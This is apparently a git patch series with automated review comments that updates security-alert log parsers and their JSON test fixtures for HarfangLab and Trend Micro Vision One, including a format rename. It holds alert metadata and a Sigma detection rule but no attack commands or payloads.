--- a/HarfangLab/harfanglab/tests/alert_5.json
+++ b/HarfangLab/harfanglab/tests/alert_5.json
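Review bot: In this fixture's `expected` block, `related.user` holds only the subject `sw-suser`, while the account that was added to the local Administrators group appears only as `action.properties.MemberName` (`DOEJ`, the domain prefix of `NT_DOMAIN\\DOEJ` having been dropped) and `user.target` carries the group `Administrateurs`, not the member; a search pivoting on `related.user` for the added account would therefore miss this alert. If the parser is intended to list every account in `related.user`, the fixture should expect `DOEJ` there as well; if the omission is deliberate, a short comment in the parser's alert stage would make that visible. Separately, `user.roles` is expected as `Postesdetravail,Postesdetravail:Lot3`, i.e. the group names with their spaces stripped, which differs from the names kept intact under `harfanglab.groups` — worth confirming that transformation is intended.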
@@ -12,6 +12,7 @@ "message": "{\"type\": \"rtlogs\", \"level\": \"medium\", \"maturity\": \"stable\", \"quarantine\": 4, \"rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"alert_time\": \"2024-11-12T08:39:14.017+00:00\", \"rule_name\": \"User Account Added to the Local Administrators Group\", \"tags\": [\"attack.persistence\", \"attack.privilege_escalation\", \"attack.t1078.003\", \"attack.t1098\"], \"level_int\": 30, \"eventlog\": {\"level\": \"log_always\", \"type\": \"wineventlog\", \"detection_timestamp\": \"2024/11/12 08:39:13.967\", \"event_id\": 4732, \"event_data\": {\"SubjectUserSid\": \"S-1-2-4-5-6\", \"SubjectDomainName\": \"NT_DOMAIN\", \"PrivilegeList\": \"-\", \"TargetDomainName\": \"Builtin\", \"TargetUserName\": \"Administrateurs\", \"MemberSid\": \"S-1-2-4-7-8\", \"MemberName\": \"NT_DOMAIN\\\\DOEJ\", \"SubjectUserName\": \"sw-suser\", \"TargetSid\": \"S-1-2-3-4\", \"SubjectLogonId\": \"0x1234567\"}, \"record_number\": 174136362, \"event_date\": \"2024-11-12T08:39:13.205Z\", \"sigma_rule_content\": \"title: User Account Added to the Local 
Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"source_name\": \"Microsoft-Windows-Security-Auditing\", \"dont_create_eventlog\": true, \"user\": {\"domain\": \"\", \"name\": \"\", \"type\": \"unknown\", \"identifier\": \"\"}, \"thread_id\": 1728, \"log_name\": \"Security\", \"process_id\": 1224, \"status\": 0, \"ioc_matches\": [], \"provider_guid\": \"54849625-5478-4994-a5ba-3e3b0328c30d\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"log_type\": \"eventlog\", \"computer_name\": \"PC01.domain.com\", \"user_data\": {}, \"system_event_type\": \"event_log_event\"}, \"threat_values\": [], \"destination\": \"syslog\", \"@timestamp\": \"2024-11-12T08:39:14.017Z\", \"detection_date\": \"2024-11-12T08:39:13.967+00:00\", \"@event_create_date\": \"2024-11-12T08:39:14.017Z\", \"aggregation_key\": \"8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb\", \"alert_type\": \"sigma\", \"rule_id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"ingestion_date\": \"2024-11-12T08:39:14.017+00:00\", \"tenant\": \"3b37ffc8520ef542\", \"threat_type\": \"new\", \"groups\": [{\"name\": \"Postes de travail\", \"id\": 
\"11111111-2222-3333-4444-555555555555\"}, {\"name\": \"Postes de travail : Lot 3\", \"id\": \"66666666-7777-8888-9999-000000000000\"}], \"status\": \"new\", \"execution\": 0, \"agent\": {\"agentid\": \"11111111-aaaa-2222-bbbb-333333333333\", \"domain\": null, \"osproducttype\": \"Windows 10 Enterprise\", \"ostype\": \"windows\", \"dnsdomainname\": \"domain.com\", \"distroid\": null, \"domainname\": \"NT_DOMAIN\", \"osversion\": \"10.0.19045\", \"hostname\": \"PC01\", \"version\": \"4.1.6\", \"additional_info\": {}}, \"threat_key\": \"20528\", \"mitre_cells\": [\"persistence__t1078.003\", \"persistence__t1098\", \"privilege-escalation__t1078.003\", \"privilege-escalation__t1098\"], \"alert_unique_id\": \"aaaaaaaa-1111-bbbb-2222-cccccccccccc\", \"log_type\": \"alert\", \"@version\": \"1\", \"msg\": \"Detects when a user account is added into the local Administrators group.\\n This action can be the result of a malicious activity.\", \"alert_subtype\": \"eventlog\", \"detection_origin\": \"agent\"}", "event": { "dataset": "alert", + "kind": "alert", "type": [ "info" ] From a71e4ec1bc766f78582c816d8633d8b733aa7790 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Mon, 2 Dec 2024 09:54:25 +0100 Subject: [PATCH 82/84] fix(TrendMicroVisionOne): add action result --- Trend Micro/trend-micro-vision-one/ingest/parser.yml | 1 + .../tests/test_eicar_test_file_detection.json | 1 + 2 files changed, 2 insertions(+) diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml index 0353bb37b..988fe612e 100644 --- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml +++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml 
@@ -37,6 +37,7 @@ stages:
 rule.id: "{{parsed_event.message.model.modelId}}"
 event.url: "{{parsed_event.message.model.workbenchLink}}"
+ event.action: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'actResult') | first).value }}"
 - set:
 user.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'account') | first).entityValue }}"
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json b/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json
index 5fb30866d..e503353f1 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json
+++ b/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json
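Review bot: The new `event.action` applies `first` to the output of `selectattr('field', '==', 'actResult')` and then dereferences `.value`; when an alert's `indicators` list carries no `actResult` entry, `first` of an empty selection does not return a mapping, so the expression may raise or render an unexpected value instead of leaving `event.action` unset. The `user.id` line below uses the same construct, so the engine may already tolerate this — if it does, a one-line comment such as `# indicators without actResult leave event.action unset` would document it; if the template engine is Jinja-based, `... | map(attribute='value') | first | default('')` would make the empty case explicit. The `- set:` action list this line belongs to starts outside the hunk.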
@@ -5,6 +5,7 @@ "expected": { "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"dee5c874-1032-4f7a-baec-8ed1ef0be1af\", \"model\": \"Eicar Test File Detection\", \"modelType\": \"preset\", \"score\": 20, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:51:29Z\", \"updatedDateTime\": \"2024-11-26T16:51:29Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 0, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"host\", \"entityValue\": {\"guid\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"110299e0-d3a0-499f-9ec3-e35ab5c2c702\"}]}, \"description\": \"Eicar test file is detected in the system.\", \"matchedRules\": [{\"id\": \"1ce01ccb-d930-4a1f-9e64-c1a117344f32\", \"name\": \"Eicar Test File Detection\", \"matchedFilters\": [{\"id\": \"4c2fd712-e89a-440a-b789-9bfcd8afd443\", \"name\": \"VSAPI Eicar Detection\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"mitreTechniqueIds\": [], \"matchedEvents\": [{\"uuid\": \"2bd63c5f-7394-4c3e-9a3c-acc77d0a43dd\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"type\": \"PRODUCT_EVENT_LOG\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"detection_name\", \"field\": \"malName\", \"value\": \"Eicar_test_1\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"file_sha1\", 
\"field\": \"fileHash\", \"value\": \"667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"filename\", \"field\": \"fileName\", \"value\": \"eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"fullpath\", \"field\": \"fullPath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\Downloads\\\\eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"WINDOWS10\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"text\", \"field\": \"actResult\", \"value\": \"File quarantined\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}]}", "event": { + "action": "File quarantined", "category": [ "intrusion_detection" ], From 776dc1e17b4fd4090e082ba91cd775faf9b86f8e Mon Sep 17 00:00:00 2001 
From: Sebastien Quioc
Date: Mon, 2 Dec 2024 09:55:43 +0100
Subject: [PATCH 83/84] fix(TrendMicroVisionOne): fix workbench alert url
---
 Trend Micro/trend-micro-vision-one/ingest/parser.yml | 2 +-
 .../tests/test_eicar_test_file_detection.json | 3 ++-
 .../tests/test_information_gathering.json | 3 ++-
 .../tests/test_internal_network_scanner.json | 3 ++-
 Trend Micro/trend-micro-vision-one/tests/test_process.json | 3 ++-
 .../trend-micro-vision-one/tests/test_project_injection.json | 3 ++-
 Trend Micro/trend-micro-vision-one/tests/test_registry.json | 3 ++-
 .../trend-micro-vision-one/tests/test_service_abuse.json | 3 ++-
 8 files changed, 15 insertions(+), 8 deletions(-)
diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml
index 988fe612e..d672e2a64 100644
--- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml
+++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml
@@ -36,7 +36,7 @@ stages:
 rule.name: "{{parsed_event.message.model}}"
 rule.id: "{{parsed_event.message.model.modelId}}"
- event.url: "{{parsed_event.message.model.workbenchLink}}"
+ event.url: "{{parsed_event.message.workbenchLink}}"
 event.action: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'actResult') | first).value }}"
 - set:
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json b/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json
index e503353f1..53813871b 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json
+++ b/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json
@@ -13,7 +13,8 @@
 "reason": "Eicar Test File Detection",
 "type": [
 "info"
- ]
+ ],
+ "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000"
 },
 "@timestamp": "2024-11-26T16:51:29Z",
 "file": {
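Review bot: `rule.id: "{{parsed_event.message.model.modelId}}"`, the context line directly above the corrected `event.url`, has the same mistake this commit fixes one line down: in the Eicar fixture `modelId` and `model` are sibling top-level keys of the message and `model` is a plain string (`\"model\": \"Eicar Test File Detection\"`), so `model.modelId` cannot resolve and `rule.id` is presumably never populated. The fix is the same one-liner, `rule.id: "{{parsed_event.message.modelId}}"`, with a matching `rule.id` expectation added to the fixtures. The `- set:` block these lines belong to starts outside the hunk.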
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json b/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json
index 4d60422b4..edbe26be4 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json
+++ b/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json
@@ -12,7 +12,8 @@
 "reason": "Potential Information Gathering",
 "type": [
 "info"
- ]
+ ],
+ "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000"
 },
 "@timestamp": "2024-11-26T16:48:06Z",
 "host": {
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json
index 5b8dbfc95..d15f28c6f 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json
+++ b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json
@@ -12,7 +12,8 @@
 "reason": "Internal Network Scanner",
 "type": [
 "info"
- ]
+ ],
+ "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509"
 },
 "@timestamp": "2024-07-23T14:46:11Z",
 "file": {
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one/tests/test_process.json
index 9a41ea92c..3c77d1afd 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_process.json
+++ b/Trend Micro/trend-micro-vision-one/tests/test_process.json
@@ -12,7 +12,8 @@
 "reason": "Credential Dumping via Mimikatz",
 "type": [
 "info"
- ]
+ ],
+ "url": "https://THE_WORKBENCH_URL"
 },
 "@timestamp": "2022-09-06T02:49:30Z",
 "file": {
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json b/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json
index dbeed8e8e..a95ac7fc8 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json
+++ b/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json
@@ -12,7 +12,8 @@
 "reason": "Process Injection from Windows Temporary Location to System32",
 "type": [
 "info"
- ]
+ ],
+ "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3"
 },
 "@timestamp": "2024-07-23T07:49:48Z",
 "host": {
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json
index 61b294270..6598afe24 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_registry.json
+++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json
@@ -12,7 +12,8 @@
 "reason": "Privilege Escalation via UAC Bypass",
 "type": [
 "info"
- ]
+ ],
+ "url": "https://THE_WORKBENCH_URL"
 },
 "@timestamp": "2022-09-06T02:49:31Z",
 "container": {
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json b/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json
index e3283fe41..a9a7d3d7c 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json
+++ b/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json
@@ -12,7 +12,8 @@
 "reason": "Possible Web Service Abuse",
 "type": [
 "info"
- ]
+ ],
+ "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000"
 },
 "@timestamp": "2024-11-26T16:45:28Z",
 "action": {
From f27eab62f8c6c3b3437d951d4e9608aef80ffa05 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc Date: Mon, 2 Dec 2024 10:00:00 +0100 Subject: [PATCH 84/84] refactor(TrendMicro): change the name of the format --- .../CHANGELOG.md | 0 .../_meta/fields.yml | 0 .../_meta/logo.png | Bin .../_meta/manifest.yml | 5 +++-- .../_meta/smart-descriptions.json | 0 .../ingest/parser.yml | 2 +- .../tests/test_eicar_test_file_detection.json | 0 .../tests/test_information_gathering.json | 0 .../tests/test_internal_network_scanner.json | 0 .../tests/test_process.json | 0 .../tests/test_project_injection.json | 0 .../tests/test_registry.json | 0 .../tests/test_service_abuse.json | 0 13 files changed, 4 insertions(+), 3 deletions(-) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/CHANGELOG.md (100%) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/_meta/fields.yml (100%) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/_meta/logo.png (100%) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/_meta/manifest.yml (73%) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/_meta/smart-descriptions.json (100%) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/ingest/parser.yml (99%) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_eicar_test_file_detection.json (100%) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_information_gathering.json (100%) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_internal_network_scanner.json (100%) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_process.json (100%) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_project_injection.json (100%) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_registry.json 
(100%) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_service_abuse.json (100%) diff --git a/Trend Micro/trend-micro-vision-one/CHANGELOG.md b/Trend Micro/trend-micro-vision-one-workbench/CHANGELOG.md similarity index 100% rename from Trend Micro/trend-micro-vision-one/CHANGELOG.md rename to Trend Micro/trend-micro-vision-one-workbench/CHANGELOG.md diff --git a/Trend Micro/trend-micro-vision-one/_meta/fields.yml b/Trend Micro/trend-micro-vision-one-workbench/_meta/fields.yml similarity index 100% rename from Trend Micro/trend-micro-vision-one/_meta/fields.yml rename to Trend Micro/trend-micro-vision-one-workbench/_meta/fields.yml diff --git a/Trend Micro/trend-micro-vision-one/_meta/logo.png b/Trend Micro/trend-micro-vision-one-workbench/_meta/logo.png similarity index 100% rename from Trend Micro/trend-micro-vision-one/_meta/logo.png rename to Trend Micro/trend-micro-vision-one-workbench/_meta/logo.png diff --git a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml b/Trend Micro/trend-micro-vision-one-workbench/_meta/manifest.yml similarity index 73% rename from Trend Micro/trend-micro-vision-one/_meta/manifest.yml rename to Trend Micro/trend-micro-vision-one-workbench/_meta/manifest.yml index da8360194..014352012 100644 --- a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml +++ b/Trend Micro/trend-micro-vision-one-workbench/_meta/manifest.yml 
@@ -1,11 +1,12 @@
 uuid: 9844ea0a-de7f-45d4-9a9b-b07651f0630e
 automation_connector_uuid: 7aa5dd7c-d694-44dd-b605-66b7974dfb05
 automation_module_uuid: 1b02d442-b804-4987-afe7-6a4be6ef35e6
-name: Trend Micro Vision One [BETA]
-slug: trend-micro-vision-one
+name: Trend Micro Vision One Workbench Alerts [BETA]
+slug: trend-micro-vision-one-workbench-alerts
 description: >-
   Trend Micro Vision One is an extended detection and response (XDR) platform that enhances threat detection, investigation, and response across multiple security layers. It provides a centralized view for improved security posture and faster threat remediation.
+  This intake format will ingest Workbench Alerts from Trend Micro Vision One.
 data_sources:
   Process monitoring:
diff --git a/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json b/Trend Micro/trend-micro-vision-one-workbench/_meta/smart-descriptions.json
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json
rename to Trend Micro/trend-micro-vision-one-workbench/_meta/smart-descriptions.json
diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one-workbench/ingest/parser.yml
similarity index 99%
rename from Trend Micro/trend-micro-vision-one/ingest/parser.yml
rename to Trend Micro/trend-micro-vision-one-workbench/ingest/parser.yml
index d672e2a64..f5859582b 100644
--- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml
+++ b/Trend Micro/trend-micro-vision-one-workbench/ingest/parser.yml
@@ -1,4 +1,4 @@
-name: trend-micro-vision-one
+name: trend-micro-vision-one-workbench
 ignored_values: []
 pipeline:
   - name: parsed_event
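Review bot: The new `slug: trend-micro-vision-one-workbench-alerts` in manifest.yml does not match the name this same commit gives the format everywhere else — the directory is renamed to `trend-micro-vision-one-workbench` and parser.yml now declares `name: trend-micro-vision-one-workbench` — so three identifiers for one format now disagree. Since the commit's stated purpose is to rename the format, I would pick one value and use it in all three places, e.g. `slug: trend-micro-vision-one-workbench`, unless the slug is deliberately distinct from the parser name, in which case a one-line comment in the manifest explaining why would save the next maintainer from "fixing" it. Note also that the `uuid` is unchanged, so this is a rename of an existing, already-published format: if anything outside this repository resolves the format by slug rather than uuid, changing the slug would break those references — worth confirming before merging. The `data_sources` mapping continues past the end of the hunk.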
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_eicar_test_file_detection.json
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json
rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_eicar_test_file_detection.json
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_information_gathering.json
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json
rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_information_gathering.json
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_internal_network_scanner.json
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json
rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_internal_network_scanner.json
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_process.json
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/tests/test_process.json
rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_process.json
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_project_injection.json
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/tests/test_project_injection.json
rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_project_injection.json
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_registry.json
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/tests/test_registry.json
rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_registry.json
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_service_abuse.json
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json
rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_service_abuse.json